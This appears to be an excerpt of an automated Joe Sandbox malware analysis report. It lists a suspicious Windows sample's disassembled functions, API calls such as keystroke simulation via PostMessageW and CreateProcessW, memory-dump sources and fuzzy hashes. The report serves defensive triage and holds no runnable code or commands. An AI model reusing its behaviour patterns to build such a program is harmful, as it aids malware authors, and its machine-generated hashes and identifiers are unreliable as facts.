                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F595DF
                                    • GetDlgCtrlID.USER32 ref: 00F595EA
                                    • GetParent.USER32 ref: 00F59606
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F59609
                                    • GetDlgCtrlID.USER32(?), ref: 00F59612
                                    • GetParent.USER32(?), ref: 00F5962E
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F59631
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: ef4c254bdbf440266f7f26995ccb758a5396fdb6f754311c82046bd752562ef8
                                    • Instruction ID: f89a689ebcb3dc15a71d59c4c3e8efdfdfa9364f37592b40cfe0177fe3cc88b8
                                    • Opcode Fuzzy Hash: ef4c254bdbf440266f7f26995ccb758a5396fdb6f754311c82046bd752562ef8
                                    • Instruction Fuzzy Hash: 0321A475E04208BFDF05AB61CC85EFEBBA8EF48301F140155BA11972E1EBB9951DBB20
                                    Function 00F59645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 00F59651
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00F59666
                                    • _wcscmp.LIBCMT ref: 00F59678
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F596F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: 1dd4d11adf835baeda4f7e2a382c954123a7ab5edeb44c85b694a5610628c894
                                    • Instruction ID: 73bce816443540f91429efd8544cbb1f227f12aec44391b656802bdda137216d
                                    • Opcode Fuzzy Hash: 1dd4d11adf835baeda4f7e2a382c954123a7ab5edeb44c85b694a5610628c894
                                    • Instruction Fuzzy Hash: 56110A7768C317FAFA152621EC06DE6779C8B05371F200127FF00A50D1FEE999187A59
                                    Function 00F64189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __swprintf.LIBCMT ref: 00F6419D
                                    • __swprintf.LIBCMT ref: 00F641AA
                                      • Part of subcall function 00F238D8: __woutput_l.LIBCMT ref: 00F23931
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F641D4
                                    • LoadResource.KERNEL32(?,00000000), ref: 00F641E0
                                    • LockResource.KERNEL32(00000000), ref: 00F641ED
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00F6420D
                                    • LoadResource.KERNEL32(?,00000000), ref: 00F6421F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 00F6422E
                                    • LockResource.KERNEL32(?), ref: 00F6423A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F6429B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: bbb0a69445e7ebf6b1369093cca3bff2423167a7f1b05629d3f9fd33de3c5564
                                    • Instruction ID: 108caac586ba99bbe20ef7c99ba82ee5871899eee316506aeb052d6002b9d7af
                                    • Opcode Fuzzy Hash: bbb0a69445e7ebf6b1369093cca3bff2423167a7f1b05629d3f9fd33de3c5564
                                    • Instruction Fuzzy Hash: 4731C1B1A0121AAFCB01AFA0ED59EFF7BACEF05301F144525F801D6150D734EA61EBA0
                                    Function 00F0FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F0FC06
                                    • OleUninitialize.OLE32(?,00000000), ref: 00F0FCA5
                                    • UnregisterHotKey.USER32(?), ref: 00F0FDFC
                                    • DestroyWindow.USER32(?), ref: 00F44A00
                                    • FreeLibrary.KERNEL32(?), ref: 00F44A65
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F44A92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: ed7e005a9ca0a8c9f09830eb2ec68baae31124576fcec97e84ded5eab90b2184
                                    • Instruction ID: 5c4a78f4ffb6580ca0b715c76d55dd3e13e03386ae0340e0ec9bb95922f632fe
                                    • Opcode Fuzzy Hash: ed7e005a9ca0a8c9f09830eb2ec68baae31124576fcec97e84ded5eab90b2184
                                    • Instruction Fuzzy Hash: B2A15D31B012128FDB29EF14C895B69F764FF04710F5442ADE80AAB692DB34AD1AFF54
                                    Function 00F5A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnumChildWindows.USER32(?,00F5AA64), ref: 00F5A9A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: 306caca6ee8c6dd0912a758d1c4649c66bbb5b42b546a606d830679b114db38f
                                    • Instruction ID: ece07b33bdf12107ee5ca357c8a05d9d3231ccc7cde82ccf6ddde4891fa455db
                                    • Opcode Fuzzy Hash: 306caca6ee8c6dd0912a758d1c4649c66bbb5b42b546a606d830679b114db38f
                                    • Instruction Fuzzy Hash: FC91C671A00616DBDB08DF60C881BE9FB75BF04311F508219DE9AA7182DF34696EFB91
                                    Function 00F02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00F02EAE
                                      • Part of subcall function 00F01DB3: GetClientRect.USER32(?,?), ref: 00F01DDC
                                      • Part of subcall function 00F01DB3: GetWindowRect.USER32(?,?), ref: 00F01E1D
                                      • Part of subcall function 00F01DB3: ScreenToClient.USER32(?,?), ref: 00F01E45
                                    • GetDC.USER32 ref: 00F3CF82
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F3CF95
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F3CFA3
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F3CFB8
                                    • ReleaseDC.USER32(?,00000000), ref: 00F3CFC0
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F3D04B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 1acecae5341f1e421a79fd3fe772afab3c4a43e3e6892c7c638445243d8ae5f7
                                    • Instruction ID: 340bdb1a25d90dc664f2871014707c9a7a2fe8a18511e7a70a0f9984798883c2
                                    • Opcode Fuzzy Hash: 1acecae5341f1e421a79fd3fe772afab3c4a43e3e6892c7c638445243d8ae5f7
                                    • Instruction Fuzzy Hash: 3D71B271900209DFCF258F64CC85ABA7BB6FF49370F14426AED55AA1AAC7318851FB60
                                    Function 00F7F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F7F9C9
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FB5C
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FB80
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FBC0
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FBE2
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F7FD5E
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F7FD90
                                    • CloseHandle.KERNEL32(?), ref: 00F7FDBF
                                    • CloseHandle.KERNEL32(?), ref: 00F7FE36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 67c593f39a8240223d311a4cf8ca9810326a0705fb1f7ca7f6e916a4daacfd9a
                                    • Instruction ID: 3a37be9c15f6ad9d36805e3acde832df6d08ea01ab3939aaf727316d4d4ca7e0
                                    • Opcode Fuzzy Hash: 67c593f39a8240223d311a4cf8ca9810326a0705fb1f7ca7f6e916a4daacfd9a
                                    • Instruction Fuzzy Hash: 49E1C331604341DFC714EF24C891B6ABBE1BF84324F14846EF8999B2A2DB75DC49EB52
                                    Function 00F0201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F02036,?,00000000,?,?,?,?,00F016CB,00000000,?), ref: 00F01B9A
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F020D3
                                    • KillTimer.USER32(-00000001,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F0216E
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F3BEF6
                                    • DeleteObject.GDI32(00000000), ref: 00F3BF6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 2402799130-0
                                    • Opcode ID: e9ea8627636be6a9c8929a79044e9809a9905028ac8a64471eac61e7ec60b551
                                    • Instruction ID: 0e819f4e36e3e1122d17cda6da253e565436c13752dd88395cb6ab013612c8d7
                                    • Opcode Fuzzy Hash: e9ea8627636be6a9c8929a79044e9809a9905028ac8a64471eac61e7ec60b551
                                    • Instruction Fuzzy Hash: 28617932904714DFDB259F24DE59B2AB7F1FF40326F108529E542879A0C775A891FFA0
                                    Function 00F64F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F638D3,?), ref: 00F648C7
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F638D3,?), ref: 00F648E0
                                      • Part of subcall function 00F64CD3: GetFileAttributesW.KERNEL32(?,00F63947), ref: 00F64CD4
                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F64FE2
                                    • _wcscmp.LIBCMT ref: 00F64FFC
                                    • MoveFileW.KERNEL32(?,?), ref: 00F65017
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: 7bf50ba4836bc14b8704112b4a9e092e5a1a2003f8ca6f7846226e6427c673c8
                                    • Instruction ID: 27be1f8499281d9be422fa52fdc3e32c9e6da2c5b197b42713888f1ab958ee16
                                    • Opcode Fuzzy Hash: 7bf50ba4836bc14b8704112b4a9e092e5a1a2003f8ca6f7846226e6427c673c8
                                    • Instruction Fuzzy Hash: C45175B24087859BC764EB60DC819DFB3ECAF85711F10092EB189D3151EF78F688A766
                                    Function 00F888B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F8896E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 9d743c9a091d2009f49b1497d02951e3a1e9bdde034b5ca36ced6a88da44145c
                                    • Instruction ID: c95b2155035ccb214fdf9a68de2ed218d1cbde9a1dfed5ec79fd76fcedfdcd88
                                    • Opcode Fuzzy Hash: 9d743c9a091d2009f49b1497d02951e3a1e9bdde034b5ca36ced6a88da44145c
                                    • Instruction Fuzzy Hash: 66518330A00208BFEF24AF24CC89BE97B65BF057A0FA04116F515E71E1DF75A986BB51
                                    Function 00F02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F3C547
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F3C569
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F3C581
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F3C59F
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F3C5C0
                                    • DestroyCursor.USER32(00000000), ref: 00F3C5CF
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F3C5EC
                                    • DestroyCursor.USER32(?), ref: 00F3C5FB
                                      • Part of subcall function 00F8A71E: DeleteObject.GDI32(00000000), ref: 00F8A757
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                    • String ID:
                                    • API String ID: 2975913752-0
                                    • Opcode ID: f4e75dbf5424e45e60d4c91e9152297de1804f25caee43edf28ff163ff50f0d5
                                    • Instruction ID: db736b274cc52b5a80e949a063329c5655d4c31e9d0e5a267736b80172e21580
                                    • Opcode Fuzzy Hash: f4e75dbf5424e45e60d4c91e9152297de1804f25caee43edf28ff163ff50f0d5
                                    • Instruction Fuzzy Hash: 38513A71A00209AFDB64DF24CC49FAA77A5EB54760F104529F906A72D0DB70E990FBA0
                                    Function 00F59B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F5AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5AE77
                                      • Part of subcall function 00F5AE57: GetCurrentThreadId.KERNEL32 ref: 00F5AE7E
                                      • Part of subcall function 00F5AE57: AttachThreadInput.USER32(00000000,?,00F59B65,?,00000001), ref: 00F5AE85
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F59B70
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F59B8D
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F59B90
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F59B99
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F59BB7
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F59BBA
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F59BC3
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F59BDA
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F59BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 8411c1702460a5fd27c46179eefb356a927f484e44639f3b9b7edca84201a759
                                    • Instruction ID: 13b0d09c3f6c6b11cc8b2c11854bd73c8283638a258bc02efd8fc60abf7bbfbd
                                    • Opcode Fuzzy Hash: 8411c1702460a5fd27c46179eefb356a927f484e44639f3b9b7edca84201a759
                                    • Instruction Fuzzy Hash: 8C11E171A50618BFF6106B60DC8EFAA3B2DEB4C752F100525F744AB0A1CAF25C14EBA4
                                    Function 00F58E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F58A84,00000B00,?,?), ref: 00F58E0C
                                    • RtlAllocateHeap.NTDLL(00000000,?,00F58A84), ref: 00F58E13
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F58A84,00000B00,?,?), ref: 00F58E28
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F58A84,00000B00,?,?), ref: 00F58E30
                                    • DuplicateHandle.KERNEL32(00000000,?,00F58A84,00000B00,?,?), ref: 00F58E33
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F58A84,00000B00,?,?), ref: 00F58E43
                                    • GetCurrentProcess.KERNEL32(00F58A84,00000000,?,00F58A84,00000B00,?,?), ref: 00F58E4B
                                    • DuplicateHandle.KERNEL32(00000000,?,00F58A84,00000B00,?,?), ref: 00F58E4E
                                    • CreateThread.KERNEL32(00000000,00000000,00F58E74,00000000,00000000,00000000), ref: 00F58E68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
